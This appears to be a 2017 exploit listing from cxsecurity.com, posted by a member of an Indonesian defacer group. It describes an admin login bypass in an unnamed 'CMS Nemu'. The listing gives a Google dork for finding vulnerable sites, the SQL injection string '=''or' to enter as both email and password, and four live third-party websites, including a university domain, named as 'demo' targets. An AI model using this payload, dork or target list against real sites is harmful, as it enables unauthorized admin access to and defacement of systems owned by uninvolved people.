CMS Nemu Bypass Login Admin Vulnerability

2017.03.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################################# # CMS Nemu Bypass Login Admin Vulnerability # Author : Berandal # Google Dork: inurl:/media.php?hal=login # Tested on: Win 7, Linux # Blog : http://www.maxteroit.com/ ################################################################################# +-+-+-+-+-+-+-+-+ |B|e|r|a|n|d|a|l| +-+-+-+-+-+-+-+-+ ################################################################################# [!] Proof: ini POC nemu sat :v Gua juga gatau nama CMS nya :v - Admin Url: http://127.0.0.1/media.php?hal=login - Email: '=''or'@gmail.com Pass: '=''or' ######################################################################## [!] Demo: http://preteli.com/media.php?hal=login http://www.xventure19.com/media.php?hal=login http://tracerstudy.mpwk.undip.ac.id/media.php?hal=login http://hellmoartwear.com/media.php?hal=login ######################################################################## [!] About: # Facebook: https://www.facebook.com/owlsquad.id # Twitter: https://www.twitter.com/id_berandal # Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer. #################################################################################

References:

http://www.maxteroit.com/
https://www.facebook.com/owlsquad.id/
https://twitter.com/id_berandal


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top